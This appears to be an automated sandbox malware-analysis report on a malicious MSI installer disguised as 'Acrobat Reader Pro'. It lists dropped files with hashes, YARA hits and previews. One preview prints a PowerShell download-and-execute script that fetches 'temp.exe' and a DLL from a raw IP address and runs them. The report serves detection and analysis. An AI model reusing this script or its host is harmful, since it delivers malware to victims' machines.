                                        Preview:..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1418
                                        Entropy (8bit):3.6844263681331086
                                        Encrypted:false
                                        SSDEEP:24:Q3KguuUyZASChuutu/uUyZ+SCarUMkW+SCcv2iRUMkWIoZot4RSiwpCviRUMkWIF:FySVEyXHZHwo04y/Hwo04q
                                        MD5:4E3993D1E152F07733D12C19F8889129
                                        SHA1:143675A3A0C17E7FF61C0EB86D394013594DA183
                                        SHA-256:6C9951BB983887DE4A21B440D78744F391B83033F69B531B32D78B4BB3F5FCCD
                                        SHA-512:484DFDE46E888D4A7C84F7C68081711005185B99FFC3A158B3B1F95030DBDA235E9780BEFFB65A22D6DD5E02AD15A508EB737F15ECD95D9EFAA7E7036FD9250A
                                        Malicious:true
                                        Preview:..$.P.r.o.c.N.a.m.e.2. .=. .".d.e.t.o.u.r.e.d...d.l.l.". . . .....$.W.e.b.F.i.l.e.2. .=. .".h.t.t.p.:././.2.0...1.2.5...1.4.1...2.2.4./.p.r.o./.$.P.r.o.c.N.a.m.e.2.". . . ..... . . .....(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.$.W.e.b.F.i.l.e.2.,.".$.e.n.v.:.U.S.E.R.P.R.O.F.I.L.E.\.D.e.s.k.t.o.p.\.$.P.r.o.c.N.a.m.e.2.".). . . ..... . . .....$.P.r.o.c.N.a.m.e. .=. .".t.e.m.p...e.x.e.". . . .....$.W.e.b.F.i.l.e. .=. .".h.t.t.p.:././.2.0...1.2.5...1.4.1...2.2.4./.p.r.o./.$.P.r.o.c.N.a.m.e.". . . . ..... . . .....(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.$.W.e.b.F.i.l.e.,.".$.e.n.v.:.U.S.E.R.P.R.O.F.I.L.E.\.D.e.s.k.t.o.p.\.$.P.r.o.c.N.a.m.e.".). . . .....S.t.a.r.t.-.P.r.o.c.e.s.s. .(.".$.e.n.v.:.U.S.E.R.P.R.O.F.I.L.E.\.D.e.s.k.t.o.p.\.$.P.r.o.c.N.a.m.e.".). . ..... . .....$.p.r.o.c.=. .S.t.a.r.t.-.P.r.o.c.e.s.s. .-.F.i.l.e.P.a.t.h. .".c.m.d...e.x.e.". . .-.A.r.g.u.m.e.n.t.L.i.s.t. ."./.
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {819D06D6-E0AA-46C4-91C3-F6F4E17BC272}, Number of Words: 2, Subject: Acrobat Reader Pro, Author: 2125.651, Name of Creating Application: Acrobat Reader Pro (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install Acrobat Reader Pro. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                        Category:dropped
                                        Size (bytes):1720832
                                        Entropy (8bit):6.565193585891705
                                        Encrypted:false
                                        SSDEEP:49152:9TiU8r6I5WCmR+JJke7awlK2FV9fXlVeIf:to6Le7a6f
                                        MD5:115C30AFBF3A6B6F7FD43B25A0D286D5
                                        SHA1:20446917C9F8AD50C1AD4432EA17682FE55BA7F4
                                        SHA-256:B25ADA06EA01E722AC2B932BAC8640C84355B29C8C298799E0EE797D18937524
                                        SHA-512:2EBBB6F283D9D62FFD4A32C4F0C22290507490DAD6B54B9844EF850633A1EA02DD89860A97BCD9279A2948EE615482BC91DEA1BDE81C50937C6A4122EA5CB00E
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_MalDoc, Description: Yara detected MalDoc, Source: C:\Windows\Installer\6e7bc0.msi, Author: Joe Security
                                        • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Windows\Installer\6e7bc0.msi, Author: Joe Security
                                        Preview:......................>.......................................................E.......a.......s.......................................Q...R...S...T...U...V...W...X...Y...Z...............................................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=.......p...@...A...B...C...D...o.......G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):570784
                                        Entropy (8bit):6.450187144191945
                                        Encrypted:false
                                        SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                        MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                        SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                        SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                        SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                        Malicious:false
                                        Joe Sandbox View:
                                        • Filename: radarinstaller.exe, Detection: malicious
                                        • Filename: radarinstaller.exe, Detection: malicious
                                        • Filename: Danfe2372342.msi, Detection: malicious
                                        • Filename: Danfe2372342.msi, Detection: malicious
                                        • Filename: id-Processo_Z5TGVQUK.msi, Detection: malicious
                                        • Filename: id-Processo_Z5TGVQUK.msi, Detection: malicious
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):570784
                                        Entropy (8bit):6.450187144191945
                                        Encrypted:false
                                        SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                        MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                        SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                        SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                        SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                        Malicious:false
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):570784
                                        Entropy (8bit):6.450187144191945
                                        Encrypted:false
                                        SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                        MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                        SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                        SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                        SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                        Malicious:false
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):570784
                                        Entropy (8bit):6.450187144191945
                                        Encrypted:false
                                        SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                        MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                        SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                        SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                        SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                        Malicious:false
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L...f.c.........."!..."............................................................q.....@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1325
                                        Entropy (8bit):5.27328056049733
                                        Encrypted:false
                                        SSDEEP:24:YBd4DOjSzu6f+AdyDdsBL3IcoeDYcZpUD+AQeDXYDhiS4ILrI+Am:Yr4DO+9fbcaLecob3YD8S7Lcbm
                                        MD5:5214DAB3E59BF6306AFDCE0958A197E0
                                        SHA1:BB58C112EE1D044295DAE730CD15D05F01C140C6
                                        SHA-256:2D42636A005FD4C06BCEF9D558522C4A235535EB69A080FCE1B4A21EDFF616FF
                                        SHA-512:1342D0F506980342F3010B5121800BFCD564650589DC62587BE292B16063AAAEF71C8445F7A3D6A5E2F35F291B4265C72DED6432F739EE73046080650E9AF257
                                        Malicious:false
                                        Preview:...@IXOS.@.....@..JV.@.....@.....@.....@.....@.....@......&.{8150EFD5-A4CB-41EF-AEB7-15BC9E7F8D67}..Acrobat Reader Pro..NotaFiscal.msi.@.....@...u.@.....@........&.{819D06D6-E0AA-46C4-91C3-F6F4E17BC272}.....@.....@.....@.....@.......@.....@.....@.......@......Acrobat Reader Pro......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{FC03EAC5-BA1F-49E5-8B24-3726A9E0E236}3.C:\Program Files (x86)\2125.651\Acrobat Reader Pro\.@.......@.....@.....@......&.{36C855C3-CBFC-424F-AA15-7C4DDD8F3200}0.02:\Software\2125.651\Acrobat Reader Pro\Version.@.......@.....@.....@......&.{F097E14A-4458-4E96-8676-952F7577E3C6},.C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.D.e.s.k.t.o.p.\.M.o.d.u.l.o. .d.e. .S.e.g.u.r.a.n...a.\..@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".3.C:\Program Files (x86)\2125.651\Acrobat Reader Pro\.@....".,.C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.D
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):634784
                                        Entropy (8bit):6.564827321629019
                                        Encrypted:false
                                        SSDEEP:12288:LXRXK9pUYawEtwPoypH29aXglK2FVL114sfUozUyMotjUPGDVeIfv:zJKHEtH7awlK2FV511fprxtjUPkVeIfv
                                        MD5:A619F980C1BAA155F7CFB79553AA10B1
                                        SHA1:DA4DCAEC351309B00D024ADB704DD61230E68F81
                                        SHA-256:A0ACE6862AC97CDCA53A9458B57901A8FE3DB546A4EA4D5BC3D05E7C119418A7
                                        SHA-512:983C44376DCBAB6855F6F474AA3BFB672D0ADAB63A38096FAE33DA80F585DA8F881A9AE352EDFE80ED3CD424E42B45FB8AA7CC27337925241844B03EE300E7D9
                                        Malicious:false
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T18Y.PV..PV..PV.."U..PV.."S..PV.."R..PV._,R..PV._,U..PV._,S.KPV.."W..PV..PW..QV..,_.!PV..,V..PV..,...PV..P...PV..,T..PV.Rich.PV.................PE..L.....c.........."!...".&...v......oo.......@...........................................@.................................L........`...................#...p...Y...R..p...................@S.......R..@............@...............................text...x$.......&.................. ..`.rdata..B....@.......*..............@..@.data........0......................@....rsrc........`.......,..............@..@.reloc...Y...p...Z...2..............@..B........................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):20480
                                        Entropy (8bit):1.162887092089409
                                        Encrypted:false
                                        SSDEEP:12:JSbX72FjGAGiLIlHVRpZh/7777777777777777777777777vDHFOSzuXptLuit/z:JUQI5toSzuXniF
                                        MD5:B3CA35F01B77A86BC9C4A698DA64A797
                                        SHA1:D1E8E19CF2E52BFAACE45887390CA9C6690369AA
                                        SHA-256:309604D83911B3FD2293A2FCF665C5B543679E6502AF9CAAA0C8068C26524850
                                        SHA-512:7099F153CB6E4E22E0A17ADAED07DC8E22A40E14AB5C9C0B57D2F56D1FA3142442912575D34CA65A8BBB053BE6766FCEE123B68CF91DFEC840DFFC3A564DB937
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):20480
                                        Entropy (8bit):1.5324744365403191
                                        Encrypted:false
                                        SSDEEP:48:Z8PhzuRc06WXJ0BT50pE2eduz4SkduzaAEkrCyjNkRduz4SkduzwT03VF:Uhz13BTn2bUYdRCyUY
                                        MD5:976A0F5B151B29EC32E6221BBA94631F
                                        SHA1:D12728FE03ECAEE4A3529BD20F5A816ADF230BE9
                                        SHA-256:64F3354560A10E5731107EF32B3E71FFF2B46D026F4A015747E297F24DA83716
                                        SHA-512:188A31FBCD9EEC4F068222C0AD49D4D99445B2A15EA2E5E09516AA66A52FB0F51A06B6B0E1A75EEDF75E70FECE0ABD73AAD578FA4148F7FB6B289F19E8885407
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):192827
                                        Entropy (8bit):5.391985284322795
                                        Encrypted:false
                                        SSDEEP:3072:iHHJCoX5CNWFHjkzRl1pqf5JjzH6wbxygaK8Nkv6kF8Kwu8K8uBD556GIlZZ6bF4:i0LVlAG
                                        MD5:61000BDC3858AF1190C0CE36E9B8A1FE
                                        SHA1:285340D91926AAADA01E17D4FDFFF8CF08B320F8
                                        SHA-256:805454C6DE84510B84BC8AA30693B088F7D512B14BAD8E29B28958290B651206
                                        SHA-512:7BC80BAF8450CD0E275A352718114DC453EAEB25DE85D90AB02C27EDB0CE35FC2DB6737211033F792AD899BABF478B45E32DB97C31CDE568D4980AE180152946
                                        Malicious:false
                                        Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):20480
                                        Entropy (8bit):1.5324744365403191
                                        Encrypted:false
                                        SSDEEP:48:Z8PhzuRc06WXJ0BT50pE2eduz4SkduzaAEkrCyjNkRduz4SkduzwT03VF:Uhz13BTn2bUYdRCyUY
                                        MD5:976A0F5B151B29EC32E6221BBA94631F
                                        SHA1:D12728FE03ECAEE4A3529BD20F5A816ADF230BE9
                                        SHA-256:64F3354560A10E5731107EF32B3E71FFF2B46D026F4A015747E297F24DA83716
                                        SHA-512:188A31FBCD9EEC4F068222C0AD49D4D99445B2A15EA2E5E09516AA66A52FB0F51A06B6B0E1A75EEDF75E70FECE0ABD73AAD578FA4148F7FB6B289F19E8885407
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):32768
                                        Entropy (8bit):1.2307692803689392
                                        Encrypted:false
                                        SSDEEP:48:7SrupK+CFXJtT5N6pE2eduz4SkduzaAEkrCyjNkRduz4SkduzwT03VF:mr5VTL2bUYdRCyUY
                                        MD5:A83DC5AC39FD7A9782BA366BFB092230
                                        SHA1:03CAB108A240FDFD9F4590694F89AA0FC6A90B78
                                        SHA-256:0C6BBA03C22187B34E2A909EFD1CC27D78DE0BFC568AC7A1CE6A1FB428C9E3D8
                                        SHA-512:256931E8EBA3D3AAEFE16EDBD4F14B5C62264B906ECF08F729F1753BDE9E6F210E9BB624C6239762892DF8278A37B51BEC83BBA1E6CDEB441C2595F72479FEAE
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):32768
                                        Entropy (8bit):0.07043540528553323
                                        Encrypted:false
                                        SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOOSuc98XptL1gVky6lit/:2F0i8n0itFzDHFOSzuXptLBit/
                                        MD5:58AFA74736D207D726C69F11DEE4A4FA
                                        SHA1:69FF1E2F7DB907D59722864EAE4010490729E0B6
                                        SHA-256:29A051B6A4C8962D01B852E2E1EA51F5AF89623E23456BD5D880CDD8649DF4E9
                                        SHA-512:4F1480C45024DD51BEC2AD7934F98986DDC467770B4466CB35420C2D4FBF5E732B2C14EE340500075BD8BA9755879DD10EC8F3542C2E699B2206E8B3FDC9754E
                                        Malicious:false
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):20480
                                        Entropy (8bit):1.5324744365403191
                                        Encrypted:false
                                        SSDEEP:48:Z8PhzuRc06WXJ0BT50pE2eduz4SkduzaAEkrCyjNkRduz4SkduzwT03VF:Uhz13BTn2bUYdRCyUY
                                        MD5:976A0F5B151B29EC32E6221BBA94631F
                                        SHA1:D12728FE03ECAEE4A3529BD20F5A816ADF230BE9
                                        SHA-256:64F3354560A10E5731107EF32B3E71FFF2B46D026F4A015747E297F24DA83716
                                        SHA-512:188A31FBCD9EEC4F068222C0AD49D4D99445B2A15EA2E5E09516AA66A52FB0F51A06B6B0E1A75EEDF75E70FECE0ABD73AAD578FA4148F7FB6B289F19E8885407
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):32768
                                        Entropy (8bit):1.2307692803689392
                                        Encrypted:false
                                        SSDEEP:48:7SrupK+CFXJtT5N6pE2eduz4SkduzaAEkrCyjNkRduz4SkduzwT03VF:mr5VTL2bUYdRCyUY
                                        MD5:A83DC5AC39FD7A9782BA366BFB092230
                                        SHA1:03CAB108A240FDFD9F4590694F89AA0FC6A90B78
                                        SHA-256:0C6BBA03C22187B34E2A909EFD1CC27D78DE0BFC568AC7A1CE6A1FB428C9E3D8
                                        SHA-512:256931E8EBA3D3AAEFE16EDBD4F14B5C62264B906ECF08F729F1753BDE9E6F210E9BB624C6239762892DF8278A37B51BEC83BBA1E6CDEB441C2595F72479FEAE
                                        Malicious:false
                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):73728
                                        Entropy (8bit):0.12509365635659195
                                        Encrypted:false
                                        SSDEEP:48:pFBwRT4duz4Skduzdduz4SkduzaAEkrCyjNkPv5p:OUYaUYdRCfv
                                        MD5:821EC4FB30C2A8D524B71177E6A9F05C
                                        SHA1:3173B9621CF1CF173561F8782FEFDDB5DF66937E
                                        SHA-256:4B4F2883877060139A59DC9DD5D4DD74A40A9BDB0902624712D7E0DEBE7F3C7B
                                        SHA-512:13F0FBC23A8ABC3E2A538600730004FE9B22EC573153EBB4C7C40834CF61E9CA6A040CD5F5B68079543EA83E38014B0B8E16D46151ABA8B164BC4C14FFF1E100
                                        Malicious:false
                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:Composite Document File V2 Document, Cannot read section info
                                        Category:dropped
                                        Size (bytes):32768
                                        Entropy (8bit):1.2307692803689392
                                        Encrypted:false
